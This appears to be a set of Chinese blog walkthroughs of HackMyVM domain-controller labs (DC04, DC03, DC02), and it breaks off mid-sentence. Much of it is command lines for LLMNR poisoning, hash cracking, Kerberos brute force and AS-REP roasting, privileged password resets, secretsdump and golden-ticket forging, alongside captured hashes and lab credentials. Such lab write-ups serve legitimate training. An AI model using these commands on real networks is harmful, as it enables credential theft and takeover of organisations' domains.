HackMyVm-DC04：难 14.1 外网打点nmap -sS -p- -T4 192.168.0.103 | grep -E '^[0-9]+/tcp' | awk -F '/' '{print $1}' | tr '\n' ',' | sed 's/,$//'nmap -sS -p 53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49664,49667,49680,49710,49765 -T4 192.168.0.103 -A自动重定向到这个域名编辑下面的文件，将ip和域名加入进去# windows C:\Windows\System32\drivers\etc\hostslinux也要，不然扫描不到东西，这里他变成了重定向次数过多，而不是之前的无法访问网站echo "192.168.0.103 soupedecode.local" >> /etc/hosts使用dir进行目录扫描，扫出来一个这个目录dirb http://soupedecode.local还有一个服务器信息http://soupedecode.local/server-info这里有一个服务版本，可以使用searchsploit检索一下（没有发现任何有用的东西）我们一直往下翻，翻到了这个东西继续将这个域名添加到hosts中，就可以访问站点了，是一个登录框14.2 后台爆破打开burp，fuzz sql注入、xss字典，都没有结果，使用相同的账号密码字典爆破也没有结果继续信息收集smbclient -L //192.168.0.103/ -N后续也尝试了各种枚举，也没有东西。。。。。。后边去看了看别人写的，就是这个机子很容易出问题，爆破几次后，后面怎么爆破都是403了最后爆破出来账号密码是 admin:nimda登录成功后会要求你输入ip地址可能是命令执行，但是尝试各种命令执行都失败了，只要和|，&相关的都不行，看来是做了过滤【RCE剖析】从0-1讲解RCE漏洞绕过，Windows与Linux/RCE漏洞绕过方式总结----实战解析14.3 LLMNR那就来试试DC3的LLMNR，我们在这个输入框里输入kali的ip地址responder -I eth0 -wdecho "websvc::soupedecode:e2985b38b501aed2:E5E63AAD4B475A06D1ECE4C7F78A2E60:010100000000000080646EFE3946DC01F711F570D52509F5000000000200080045004B0042004F0001001E00570049004E002D0043003700380051004F0038004100440032003100490004003400570049004E002D0043003700380051004F003800410044003200310049002E0045004B0042004F002E004C004F00430041004C000300140045004B0042004F002E004C004F00430041004C000500140045004B0042004F002E004C004F00430041004C000700080080646EFE3946DC01060004000200000008003000300000000000000000000000004000005C18B02FEAC5263030D32A3F0BCCDD51E0CAD786D3DFBABF65601AC3E74CE55D0A001000000000000000000000000000000000000900240063006900660073002F003100390032002E003100360038002E0030002E003100340038000000000000000000" > hash john hash --wordlist=/usr/share/wordlists/rockyou.txtwebsvc:jordan23密码已过期，应该知道怎么搞了吧14.5 近源攻击！按住esc进入选择用户界面，然后根据步骤一步一步走输入原来的账号密码选择ok，说明你密码输入对了随后就可以修改你的账号密码了14.6 smb信息收集账号密码 websvc:jordan23smbclient -L //192.168.0.103 -U "SOUPEDECODE.LOCAL/websvc%admin123"在c盘找到第一个flagsmbclient //192.168.0.103/C -U "SOUPEDECODE.LOCAL/websvc%admin123"14.7 查询域内SPN关联用户有了域内的账号密码，再来看看SPN，查询域内所有关联了 SPN 的用户，用来获取他们的凭据，没有结果14.8 枚举域内用户SIDpython /usr/share/doc/python3-impacket/examples/lookupsid.py soupedecode.local/websvc@192.168.0.103 > users grep "SidTypeUser" /data/demo/users | awk -F '\\\\' '{print $2}' | awk '{print $1}' | sort -u > /data/demo/target_users.txt14.9 获取不需要预认证用户的AS-REP哈希结果没有impacket-GetNPUsers -dc-ip 192.168.0.103 soupedecode.local/ -usersfile target_users.txt > hash cat hash | grep +14.10 ldapdomaindump收集 LDAP 信息，获取域内用户列表、权限分组（如 Domain Admins）、账号状态（启用 / 禁用），锁定高价值目标（如 Administrator）。ldapdomaindump -u "SOUPEDECODE.LOCAL\websvc" -p admin123 192.168.0.103 python -m http.server访问8000端口，看到用户不属于任何特权组，仅仅是普通用户仔细翻翻看，找到一个默认的账号密码rtina979 ：Z~l3JhcV#7Q-1#M同样的密码过期，需要近源攻击！smbclient //192.168.0.103/C$ -U "SOUPEDECODE.LOCAL/rtina979%Z~l3JhcV#7Q-1#M"这里给你们一张表，输入清楚了哈，我输了十多遍，艹14.11 二次smb信息收集此时就能正常登录了在rtina979用户的Documents文件夹里找到一个rar压缩包，把它下载下来解压需要密码fcrackzip 工具只能用于破解 ZIP 文件，而我们的文件是 RAR 格式。使用 rar2john 将 RAR 文件转换为 John the Ripper 可识别的哈希格式。提取哈希：rar2john Report.rar > report_hash.txt使用字典攻击（使用 rockyou.txt）：john --wordlist=/usr/share/wordlists/rockyou.txt report_hash.txt解压，输入密码PASSWORD123解压出来会发现当前目录有一个htm文件是一个渗透测试报告在这个报告最后，能看到krbtgt的hash内容14.12 黄金票据攻击条件： 获取 KRBTGT 账户哈希 - 通过 DCSync 或其他方式 获取域 SID - 通过 LDAP 或 SMB 枚举 知道域名 - 目标域的完整名称 获取到了KRBTGT哈希 先验证一下是否是正确的，红色代表失败，紫色代表hash正确，或者账户禁用，或者密码过期等等0f55cdc40bd8f5814587f7e6b2f85e6f14.12.1 获取域SID域SID为：S-1-5-21-2986980474-46765180-2505414164python /usr/share/doc/python3-impacket/examples/lookupsid.py soupedecode.local/rtina979@192.168.0.10314.12.2 同步域时间在平时可能会遇到kali和靶机的时间一直都不同步，怎么使用ntpdate或者其他时间同步工具，就是同步不起来，就需要使用下面第一行的命令了systemctl stop systemd-timesyncd # 停止自动时间同步服务 ntpdate 192.168.0.103 # 强制同步时间14.12.3 生成管理员的黄金票据impacket-ticketer -nthash 0f55cdc40bd8f5814587f7e6b2f85e6f -domain-sid S-1-5-21-2986980474-46765180-2505414164 -domain soupedecode.local administrator14.12.4 导入票据到环境变量export KRB5CCNAME=administrator.ccache14.12.5 使用票据impacket-wmiexec soupedecode.local/administrator@dc01.soupedecode.local -k -target-ip 192.168.0.103至此渗透完成啦14.13 总结DC04 域渗透从外网打点起步，nmap 扫描发现目标开放 80、88、445 等端口，访问 80 端口需配置 hosts 解析域名，目录扫描找到后台登录页。爆破无果后，利用后台 IP 输入框发起 LLMNR 投毒，捕获 websvc 用户哈希并破解密码，通过近源攻击修改过期密码。登录 SMB 获取首个 flag 后，枚举域用户发现 rtina979 账号及密码，再次近源攻击修改密码。登录其 SMB 下载加密压缩包，破解后得到渗透报告，从中提取 krbtgt 用户哈希。获取域 SID 并同步时间后，生成 Administrator 黄金票据，导入环境变量后通过 wmiexec 成功登录域控，获取最高权限，全程依赖凭据获取与票据攻击，突破多重限制完成渗透。往期推荐全网首发！HMV全套windows机器提权，域渗透教程，2w字超详细HackMyVm-DC04 ：简单HackMyVm-DC03 ：简单HackMyVm-DC02 ：简单HackMyVm-DC01 ：简单HackMyVm-TriplAdvisor ：简单HackMyVm-Runas ：简单HackMyVm-Always ：简单HackMyVm-Nessus ：简单HackMyVm-Liar ：简单HackMyVm-Simple ：简单HackMyVm-Simple ：简单HackMyVm-Zero ：简单HackMyVm-OMG ：简单新版BurpSuite v2025.6.3汉化版，附激活教程Fine！2025最新款信息收集综合工具若依Vue漏洞检测工具v7更新最好用的下一代目录爆破工具，全方位的目录爆破集成MemProcFS，Vol2和Vol3的内存取证神器重大更新！FeatherScan v4.5 内网 linux 信息收集，提权一键梭哈神器x-waf，一个基于fuzz的waf绕过渗透工具这10款内网穿透工具，一定有你没用过的红队命令速查手册挖SRC必须知道的25个漏洞提交平台挖SRC必须知道的25个漏洞提交平台FeatherScan v4.0 - 一款Linux内网全自动信息收集工具掩日-适用于红队的综合免杀工具2025最新渗透测试靶场推荐近400个渗透测试常用命令，信息收集、web、内网、隐藏通信、域渗透等等【内网渗透】隐藏通信隧道技术内网渗透必备，microsocks，一个轻量级的socks代理工具神器分享 红队快速打点工具-DarKnuclei红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路【渗透测试】DC1~9(全) Linux提权靶机渗透教程，干货w字解析，建议收藏【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！一个永久的渗透知识库【oscp】vulnerable_docker，三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式内网渗透必备，microsocks，一个轻量级的socks代理工具【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！绝对干货！DC-2综合渗透，rbash逃逸，git提权，wordpress靶场渗透教程【渗透测试】12种rbash逃逸方式总结红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路红日靶场3，joomla渗透，海德拉SMB爆破，域内5台主机横向移动教学不用MSF？红日靶场4，从外网到域控，手工干永恒之蓝，教科书级渗透教学ATK&CK红日靶场二，Weblogic漏洞利用，域渗透攻略sql注入中各种waf的绕过方式，狗，盾，神，锁，宝利用MySQL特性，WAF绕过技巧SQL注入绕过某狗的waf防火墙，这一篇就够了，6k文案超详细大型翻车现场，十种waf绕过姿势，仅成功一种喜欢长文吗？1w字图文带你了解sqlmap，从0到1，WAF绕过，高级用法一文通透

HackMyVm-DC03 ：中等 13.1 外网打点nmap -sS -p- -T4 192.168.215.185 | grep -E '^[0-9]+/tcp' | awk -F '/' '{print $1}' | tr '\n' ',' | sed 's/,$//'卧槽什么都没有，这怎么打？nmap -sS -p 53,13487,65005 -T4 192.168.215.185 -A扫错了，哈哈哈哈，靶机重启，原来是我换wifi了再来nmap -sS -p- -T4 192.168.215.25 | grep -E '^[0-9]+/tcp' | awk -F '/' '{print $1}' | tr '\n' ',' | sed 's/,$//'nmap -sS -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49664,49668,49672,49685 -T4 192.168.215.25 -A根据上面的dc2靶场进行信息收集一波,ldap协议是开启着的，还有smb协议enum4linux-ng -A 192.168.215.25 -C13.2 尝试使用匿名登录smb匿名连接13.3 kerberos 用户名枚举kerbrute userenum -d SOUPEDECODE.LOCAL /data/SecLists_Dict/Usernames/xato-net-10-million-usernames.txt --dc 192.168.215.25charlie administrator wreed11 webserver爆破smbnxc smb 192.168.215.25 -u user -p user13.4 爆破 kerberos 协议kerbrute bruteuser --dc 192.168.215.25 -d SOUPEDECODE.LOCAL /data/SecLists_Dict/Usernames/xato-net-10-million-usernames.txt wreed11 kerbrute bruteuser --dc 192.168.215.25 -d SOUPEDECODE.LOCAL /data/SecLists_Dict/Usernames/xato-net-10-million-usernames.txt charlie三个用户接失败13.4 LLMNR 投毒攻击13.4.1 具体流程骗取目标设备的账号密码哈希，具体流程如下： 监听局域网内的 LLMNR 请求：用 Responder（你之前用过的工具）等软件，在攻击机上监听局域网内的 LLMNR 广播； 伪造响应欺骗目标：当目标设备（比如域内的员工电脑）发起 LLMNR 请求（如解析 \\共享打印机名）时，攻击机抢先回复：“我就是你要找的设备，我的 IP 是攻击机 IP”； 骗取哈希值：目标设备相信后，会试图用当前登录用户的 “NTLM 哈希” 与攻击机建立连接（比如访问共享文件夹），攻击机就能捕获到这个哈希； 破解哈希或直接用哈希登录：拿到哈希后，可通过 hashcat 破解成明文密码，或直接用 “哈希传递（PTH）” 登录其他设备。 13.4.2 如何用 LLMNR 拿到域内哈希比如你在域渗透中，攻击机和目标域内的员工电脑在同一个网段（192.168.215.0/24）： 在 Kali 上启动 Responder，开启 LLMNR 监听： 员工在电脑上误输入 \\不存在的共享名（比如 \\file-server），DNS 解析失败，触发 LLMNR 广播； Responder 捕获到这个请求，伪装成 file-server 回复员工电脑； 员工电脑用当前登录用户（比如 SOUPEDECODE\charlie）的 NTLM 哈希，尝试与攻击机建立 SMB 连接； Responder 成功捕获到 charlie 的哈希，你后续就可以用这个哈希进行 PTH 攻击，登录其他域内设备。 responder -I eth0 -wd这里应该是域控靶机的计划任务，所以能拿到hash拿到这个账号的hash，准备去爆破[SMB] NTLMv2-SSP Client : 240a:42c2:802:3c85:e8b7:3202:ffea:f6fd [SMB] NTLMv2-SSP Username : SOUPEDECODE\DC01$ [SMB] NTLMv2-SSP Hash : DC01$::SOUPEDECODE:b7c95f1435ed324f:38D48E36709F60B6B02218D61D394294:010100000000000000A791D28545DC0159ED6A549FAD342D0000000002000800330037005300330001001E00570049004E002D005500350050004500330055004F00300044004600550004003400570049004E002D005500350050004500330055004F0030004400460055002E0033003700530033002E004C004F00430041004C000300140033003700530033002E004C004F00430041004C000500140033003700530033002E004C004F00430041004C000700080000A791D28545DC010600040002000000080030003000000000000000000000000040000033BE778EBDE22DAB53FA856B26B3A1EABC23AFB04656C990D86DF46D0504C4230A0010000000000000000000000000000000000009002C0063006900660073002F0053004F005500500045004400450043004F00440045002E004C004F00430041004C000000000000000000 --- [SMB] NTLMv2-SSP Client : 240a:42c2:802:3c85:e8b7:3202:ffea:f6fd [SMB] NTLMv2-SSP Username : soupedecode\xkate578 [SMB] NTLMv2-SSP Hash : xkate578::soupedecode:0215e15662d218c6:75CB92B3BD84CC2BA33FD7549A0D1EA4:010100000000000000A791D28545DC018EC3298268DA333B0000000002000800330037005300330001001E00570049004E002D005500350050004500330055004F00300044004600550004003400570049004E002D005500350050004500330055004F0030004400460055002E0033003700530033002E004C004F00430041004C000300140033003700530033002E004C004F00430041004C000500140033003700530033002E004C004F00430041004C000700080000A791D28545DC010600040002000000080030003000000000000000000000000040000033BE778EBDE22DAB53FA856B26B3A1EABC23AFB04656C990D86DF46D0504C4230A0010000000000000000000000000000000000009001E0063006900660073002F00460069006C006500530065007200760065007200000000000000000013.5 smb渗透找到账号密码，查看smb服务器内有什么东西xkate578:jesuschrist smbclient -L //192.168.215.25/ -U xkate578登录到share共享文件夹，发现user.txt尝试上传，发现这个用户有上传文件的权限使用evil-winrm连接失败evil-winrm -i 192.168.215.25 -u xkate578 -p jesuschrist13.6 查询域内SPN关联用户查询寻域内所有关联了SPN的用户（用于发现这些用户的TGS票据，从而破解密码）13.7 枚举域内用户SIDxkate578这个用户有查看域内SID信息的权限python /usr/share/doc/python3-impacket/examples/lookupsid.py soupedecode.local/xkate578@192.168.215.25 > results.txt把这些用户名信息导出为一个用户字典grep "SidTypeUser" /data/demo/results.txt | awk -F '\\\\' '{print $2}' | awk '{print $1}' | sort -u > /data/demo/target_users.txt13.8 爆破 kerberos针对域用户 xkate578 进行 “密码暴力破解” 的操作，核心目的是通过字典攻击尝试获取该用户的明文密码。ntpdate 192.168.215.25 kerbrute bruteuser --dc 192.168.215.25 -d SOUPEDECODE.LOCAL /data/SecLists_Dict/Usernames/xato-net-10-million-usernames-dup.txt xkate578 -v13.9 nxc爆破smb使用nxc内网渗透神器，使用相同的账号密码爆破smb服务器，全部失败13.10 获取不需要预认证用户的AS-REP哈希全部没有impacket-GetNPUsers -dc-ip 192.168.215.25 soupedecode.local/ -usersfile target_users.txt利用之前得到的密码 xkate578:jesuschristldapsearch -x -H ldap://192.168.215.25 -D "xkate578@SOUPEDECODE.LOCAL" -w 'jesuschrist' -b 'DC=SOUPEDECODE,DC=LOCAL' "sAMAccountName=xkate578" memberOf > ldap_result.txt 参数 作用 -x 使用简单认证（非 SASL 认证），适合用用户名 / 密码登录。 -H ldap://192.168.215.25 指定 LDAP 服务器地址（这里是域控的 IP）。 -D "xkate578@SOUPEDECODE.LOCAL" 绑定的用户 DN（用户名），即使用 xkate578 的凭证登录 LDAP。 -w 'jesuschrist' 绑定用户的密码（xkate578 的密码）。 -b 'DC=SOUPEDECODE,DC=LOCAL' 查询的基准 DN（域的根目录），即从整个域范围查询。 "sAMAccountName=xkate578" 过滤条件：只查询 sAMAccountName 为 xkate578 的用户（精准定位自身）。 memberOf 只返回该用户的 memberOf 字段（即所属的组）。 > ldap_result.txt 将结果输出到文件，方便查看。 从结果中可以看到这个用户属于Account Operators 组作用： 创建 / 修改 / 删除普通域用户账号可在域内新增用户（如 testuser）、修改现有用户的属性（如密码、登录脚本、所属组等），但不能修改域管理员（Domain Admins）等高级账号。 管理用户组（非特权组）可创建新的普通用户组，或修改普通组的成员（如将 zximena448 加入某个组），但不能修改 Domain Admins、Enterprise Admins 等特权组。 重置普通用户密码可强制重置普通域用户的密码（无需知道原密码），例如将 zximena448 的密码改为 hacked123，进而控制该账号。 查看域内用户 / 组的详细信息比普通用户拥有更高的 LDAP 查询权限，可获取更多域内账号的属性（如密码过期时间、登录次数等）。 尝试利用net命令和这些凭证，向目标域添加一个用户，然后使用evil-winrm连接的时候，连接不上net rpc user add "it_support" "ItSupport@123" -U "SOUPEDECODE.LOCAL/xkate578%jesuschrist" -S 192.168.215.25 evil-winrm -i 192.168.215.25 -u it_support -p 'ItSupport@123'将用户添加到远程管理组即可使用evil-winrm连接net rpc group addmem "Remote Management Users" it_support -U "SOUPEDECODE.LOCAL/xkate578%jesuschrist" -S 192.168.215.25 evil-winrm -i 192.168.215.25 -u it_support -p 'ItSupport@123'那么尝试添加管理员组呢？很明显，之前已经说过了，Account Operators组的用户，可创建新的普通用户组，或修改普通组的成员（如将 zximena448 加入某个组），但不能修改 Domain Admins、Enterprise Admins 等特权组。再看看管理员组有哪些用户，一个是Operators，一个是Administrator，两个用户属于超级管理员’ldapsearch -x -H ldap://192.168.215.25 -D "xkate578@SOUPEDECODE.LOCAL" -w 'jesuschrist' -b "DC=SOUPEDECODE,DC=LOCAL" "memberOf=CN=Domain Admins,CN=Users,DC=SOUPEDECODE,DC=LOCAL" sAMAccountName name从 LDAP 查询结果中，有几个关键线索表明 Operators 是自定义组而非 Windows 内置组：Windows 内置操作员组都有特定的前缀： Backup Operators Print Operators Server Operators Account Operators 而这里发现： 组名：Operators（没有前缀） 这不符合 Windows 内置组的命名规范 sAMAccountName 分析ldif# Operators, Users, SOUPEDECODE.LOCAL dn: CN=Operators,CN=Users,DC=SOUPEDECODE,DC=LOCAL name: Operators sAMAccountName: Operators关键点： sAMAccountName: Operators（没有数字后缀） Windows 内置组通常有特定的 sAMAccountName 格式 例如内置的 Account Operators 的 sAMAccountName 是 Account Operators 另外# 内置组通常在 Builtin 容器中 dn: CN=Account Operators,CN=Builtin,DC=SOUPEDECODE,DC=LOCAL我们再来查看自定义组中有哪些用户ldapsearch -x -H ldap://192.168.215.25 -D "xkate578@SOUPEDECODE.LOCAL" -w 'jesuschrist' -b "DC=SOUPEDECODE,DC=LOCAL" "(&(objectClass=user)(memberOf=CN=Operators,CN=Users,DC=SOUPEDECODE,DC=LOCAL))" sAMAccountName name# Account Operators 不能重置这些直接组成员的密码： - 直接属于 Administrators 的用户 - 直接属于 Domain Admins 的用户 # 但可以重置这些用户的密码： - 通过组嵌套获得管理员权限的用户 - 属于自定义管理组的用户再不清楚，就是这个链路Domain Admins (域管理员组) ↑ 包含 Operators (自定义管理组) ↑ 包含 fbeth103 (普通用户) xkate578 (Account Operators) → 可以重置 fbeth103 密码开始修改密码（回家重装了靶机，ip变了）net rpc user password "fbeth103" "P@ssw0rd123" -U "SOUPEDECODE.LOCAL/xkate578%jesuschrist" -S 192.168.0.102 # 或者 [root@kali] /home/kali/DC03 ❯ rpcclient -U "xkate578" --password="jesuschrist" 192.168.56.126 ⏎ rpcclient $> setuserinfo2 fbeth103 23 "Pass1234!" rpcclient $> # 然后连接 evil-winrm -i 192.168.0.102 -u fbeth103 -p 'P@ssw0rd123'此时就已经得到了最后的root.txt内容它这个自定义既然组隶属于管理员组，那我们是不是能利用这个fbeth103用户去修改管理员的账号密码呢？现在试试┌──(root㉿kali)-[~] └─# net rpc user password "Administrator" "NewAdminPass123" -U "SOUPEDECODE.LOCAL/fbeth103%P@ssw0rd123" -S 192.168.0.102 ┌──(root㉿kali)-[~] └─# evil-winrm -i 192.168.0.102 -u Administrator -p 'NewAdminPass123' Evil-WinRM shell v3.7 Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\Administrator\Documents> whoami soupedecode\administrator 成功修改！都不需要去PTH（哈希传递攻击）了13.11 PTH攻击（hash传递）Secretdump获取域内hashimpacket-secretsdump 'SOUPEDECODE.LOCAL/fbeth103:P@ssw0rd123'@192.168.0.10213.12 工具推荐 ldapdomaindump除了ldapsearch工具之外，还有一个工具也可以看域内组织情况，叫做ldapdomaindumpldapdomaindump -u "SOUPEDECODE.LOCAL\fbeth103" -p P@ssw0rd123 192.168.0.102在生成的domain_groups.html中也能看到Operators属于Domain Admins组从这里也能看到fbeth103属于Operators组用这个工具更为方便13.13 DC03 域渗透总结本次 DC03 域渗透从外网打点开始，先通过 nmap 扫描确定目标为域控制器，开启 53、88、139、445、389 等关键端口。匿名登录 SMB 失败后，用 kerbrute 枚举到 charlie、administrator 等用户，爆破无果后通过 Responder 进行 LLMNR 投毒，捕获到 xkate578 的 NTLM 哈希并破解出密码。利用 xkate578（属 Account Operators 组）的账号管理权限，先创建影子账号并加入远程管理组，成功登录后枚举域内用户，发现自定义组 Operators 隶属于 Domain Admins，且包含用户 fbeth103。重置 fbeth103 密码并登录，利用其间接域管理员权限，成功修改 Administrator 密码，获取域控最高权限，最终找到 root.txt，全程未依赖复杂漏洞，主要通过权限嵌套与凭据复用推进。往期推荐全网首发！HMV全套windows机器提权，域渗透教程，2w字超详细HackMyVm-DC04 ：简单HackMyVm-DC03 ：简单HackMyVm-DC02 ：简单HackMyVm-DC01 ：简单HackMyVm-TriplAdvisor ：简单HackMyVm-Runas ：简单HackMyVm-Always ：简单HackMyVm-Nessus ：简单HackMyVm-Liar ：简单HackMyVm-Simple ：简单HackMyVm-Simple ：简单HackMyVm-Zero ：简单HackMyVm-OMG ：简单新版BurpSuite v2025.6.3汉化版，附激活教程Fine！2025最新款信息收集综合工具若依Vue漏洞检测工具v7更新最好用的下一代目录爆破工具，全方位的目录爆破集成MemProcFS，Vol2和Vol3的内存取证神器重大更新！FeatherScan v4.5 内网 linux 信息收集，提权一键梭哈神器x-waf，一个基于fuzz的waf绕过渗透工具这10款内网穿透工具，一定有你没用过的红队命令速查手册挖SRC必须知道的25个漏洞提交平台挖SRC必须知道的25个漏洞提交平台FeatherScan v4.0 - 一款Linux内网全自动信息收集工具掩日-适用于红队的综合免杀工具2025最新渗透测试靶场推荐近400个渗透测试常用命令，信息收集、web、内网、隐藏通信、域渗透等等【内网渗透】隐藏通信隧道技术内网渗透必备，microsocks，一个轻量级的socks代理工具神器分享 红队快速打点工具-DarKnuclei红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路【渗透测试】DC1~9(全) Linux提权靶机渗透教程，干货w字解析，建议收藏【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！一个永久的渗透知识库【oscp】vulnerable_docker，三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式内网渗透必备，microsocks，一个轻量级的socks代理工具【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！绝对干货！DC-2综合渗透，rbash逃逸，git提权，wordpress靶场渗透教程【渗透测试】12种rbash逃逸方式总结红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路红日靶场3，joomla渗透，海德拉SMB爆破，域内5台主机横向移动教学不用MSF？红日靶场4，从外网到域控，手工干永恒之蓝，教科书级渗透教学ATK&CK红日靶场二，Weblogic漏洞利用，域渗透攻略sql注入中各种waf的绕过方式，狗，盾，神，锁，宝利用MySQL特性，WAF绕过技巧SQL注入绕过某狗的waf防火墙，这一篇就够了，6k文案超详细大型翻车现场，十种waf绕过姿势，仅成功一种喜欢长文吗？1w字图文带你了解sqlmap，从0到1，WAF绕过，高级用法一文通透

HackMyVm-DC02 ：中等 中途可能会切换好几次IP，但是都是同一个靶机，我自己网络不稳定，或者机器环境有问题，重装导致的，不用管IP的变化12.1 端口扫描这里使用nmap进行全端口扫描，识别目标开放的服务和操作系统信息nmap -sS -p- -T4 192.168.219.240 -A端口53：DNS服务，用于域名解析 端口88：Kerberos认证，域用户登录验证 端口139/445：SMB文件共享服务 端口389：LDAP目录服务，存储用户信息 端口636：安全的LDAP 端口5985：WinRM远程管理 这些端口组合表明这是一个域控制器！12.2 enum4linux枚举使用enum4linux-ng通过 LDAP/SMB/RPC 等协议枚举目标系统信息（是enum4linux的升级版，现在有社区维护，老版已不再维护）enum4linux-ng -A 192.168.219.240 -C工具作用：通过 SMB/LDAP/RPC 等协议自动枚举 Windows 域环境信息12.3 尝试使用匿名登录目的：检查是否允许匿名访问SMB共享 结果：需要认证，匿名访问被拒绝smbclient -L //192.168.219.227/ -N12.4 kerberos 用户名枚举字典使用的是seclist，总共发现了3个用户，admin / zximena448 / charliekerbrute userenum -d SOUPEDECODE.LOCAL /data/SecLists_Dict/Usernames/xato-net-10-million-usernames-dup.txt --dc 192.168.219.227kerbrute：一款用于Kerberos用户枚举和密码爆破的工具。userenum：用户枚举模式。-d SOUPEDECODE.LOCAL：指定域名。/usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames-dup.txt：用户名字典路径。--dc 192.168.219.240：指定域控制器的IP地址。12.5 爆破 kerberos 协议爆破kerberos 协议的时候，需要同步时间（Kerberos要求时间偏差在5分钟内）ntpdate 192.168.219.227 # 将本地时间与目标域控制器同步 kerbrute bruteuser --dc 192.168.219.227 -d SOUPEDECODE.LOCAL /data/SecLists_Dict/Usernames/xato-net-10-million-usernames-dup.txt charlie -v# 参数解析 bruteuser：针对单个用户进行密码爆破 --dc 192.168.219.240：域控制器IP -d SOUPEDECODE.LOCAL：域名 /usr/share/...usernames-dup.txt：密码字典（这里误用了用户名字典，应该用密码字典） charlie：目标用户名 -v：详细输出模式如果不同步时间就会出现如下结果为什么需要同步时间？Kerberos 认证流程中，客户端向 KDC（域控制器）请求票据（如 AS-REQ）时，会在请求中包含当前时间戳，KDC 收到请求后会：检查客户端时间戳与自身系统时间的偏差是否在允许范围内（默认通常为 5 分钟，由域策略 Maximum tolerance for computer clock synchronization 控制）。若偏差超过阈值，KDC 会直接拒绝请求，返回错误 KDC_ERR_CLOCK_SKEW_TOO_GREAT（时钟偏差过大）。有了账号密码charlie/charlie，登录smb服务使用evil-winrm远程连接服务器（类似于3389端口的rdp远程连接），这个服务运行在5985端口evil-winrm -i 192.168.219.227 -u charlie -p charlie12.6 查询域内SPN关联用户有了域内的账号密码，再来看看SPN，查询域内所有关联了 SPN 的用户，用来获取他们的凭据，没有结果impacket-GetUserSPNs -request -dc-ip 192.168.219.227 SOUPEDECODE.LOCAL/charlie:charlie12.7 枚举域内用户SID再由于目标域不支持匿名登录（包括smb）所以不能使用-no-pass参数来枚举这个域的SID核心作用是通过 SMB/LDAP 协议查询目标系统的SID SMB/LDAP 及其账号和组信息python /usr/share/doc/python3-impacket/examples/lookupsid.py soupedecode.local/charlie@192.168.219.240 -no-passSID遍历，枚举域内用户，使用账号密码charlie:charlie（看看charlie这个用户有没有权限查看SID）python /usr/share/doc/python3-impacket/examples/lookupsid.py soupedecode.local/charlie@192.168.219.240正常枚举域内用户信息，把它归纳成一个字典python /usr/share/doc/python3-impacket/examples/lookupsid.py soupedecode.local/charlie@192.168.219.240 > user # 将枚举出来的用户都筛选出来，去掉多余字符 grep "SidTypeUser" /data/demo/user | awk -F '\\\\' '{print $2}' | awk '{print $1}' | sort -u > /data/demo/target_users.txt12.8 获取不需要预认证用户的AS-REP哈希正常情况下，银行（KDC）会强制要求你提供 “加密时间戳”（预认证）才给你凭证 —— 但如果某个用户的 “银行卡设置” 里，把 “必须要预认证” 这个选项关了（域用户未启用 Kerberos 预认证），会发生什么？→ 你不用提供 “加密时间戳”，只要报出 “身份证号”（用户名），银行就直接把 “加密的取钱凭证”（AS-REP 票据）给你了！→ 拿到这张凭证（AS-REP 哈希）后，你就可以拿回家 “慢慢试密码”（用 hashcat/john 爆破）—— 反正凭证是加密的，试错不会被银行发现（不会触发账号锁定）。这就是为什么要找 “不需要预认证的用户”：能无风险、无凭证地拿到他的 AS-REP 哈希，进而破解出明文密码。impacket-GetNPUsers -dc-ip 192.168.219.240 soupedecode.local/ -usersfile target_users.txt > hash12.9 AS-REP哈希爆破使用hashcat爆破不需要预认证的AS-REP哈希结果hashcat -a 0 -m 18200 res.txt /usr/share/wordlists/rockyou.txt提示，设备 #1：此次攻击所需的可分配设备内存不足，切换爆破工具john得到密码internet，那么配合前面的账号密码就是zximena448 ：internet ，再次远程连接evil-winrm -i 192.168.219.240 -u zximena448 -p internet使用smbclient连接smb服务，查看有什么东西smbclient -L //192.168.219.240/ -U zximena448使用这个用户连接C$这个smb共享文件夹再连接ADMIN$这个共享文件夹，也能连接（不过没有发现什么可用的文件）在C$共享文件夹中找到flag用 zximena448 账号查询域内用户信息，获取高权限账号（如 Administrator）的线索。12.10 收集 LDAP 信息目的：获取域内用户列表、权限分组（如 Domain Admins）、账号状态（启用 / 禁用），锁定高价值目标（如 Administrator）。必要性：没有域内用户信息，后续攻击会盲目尝试，效率极低。前提：拥有至少一个有效的域内用户凭证（如 zximena448:internet），且域控的 LDAP 端口（389）开放。原理：域内普通用户默认有权限查询 LDAP 目录的基础信息。命令如下ldapsearch -x -H ldap://192.168.219.240 -D "zximena448@SOUPEDECODE.LOCAL" -w 'internet' -b 'DC=SOUPEDECODE,DC=LOCAL' "sAMAccountName=zximena448" memberOf > ldap_result.txt -x 使用简单认证（非 SASL 认证），适合用用户名 / 密码登录。 -H ldap://192.168.215.25 指定 LDAP 服务器地址（这里是域控的 IP）。 -D "zximena448@SOUPEDECODE.LOCAL" 绑定的用户 DN（用户名），即使用 zximena448 的凭证登录 LDAP。 -w 'jesuschrist' 绑定用户的密码（zximena448 的密码）。 -b 'DC=SOUPEDECODE,DC=LOCAL' 查询的基准 DN（域的根目录），即从整个域范围查询。 "sAMAccountName=zximena448" 过滤条件：只查询 sAMAccountName 为 zximena448 的用户（精准定位自身）。 memberOf 只返回该用户的 memberOf 字段（即所属的组）。 > ldap_result.txt 将结果输出到文件，方便查看。 发现zximena448 属于 Backup Operators 组，Backup Operators 是 Windows 域内置的特权组，默认被赋予了 “备份 / 恢复域控系统数据” 的核心权限，而 “备份数据” 的权限恰好覆盖了域控的敏感文件（如存储账号哈希的 NTDS.dit、注册表 SAM/SYSTEM 等）。攻击方式：在 Kali 上启动 SMB 服务，用于接收从目标机器导出的敏感文件（如注册表备份）。impacket-smbserver -smb2support "share" .前提：Kali 的 SMB 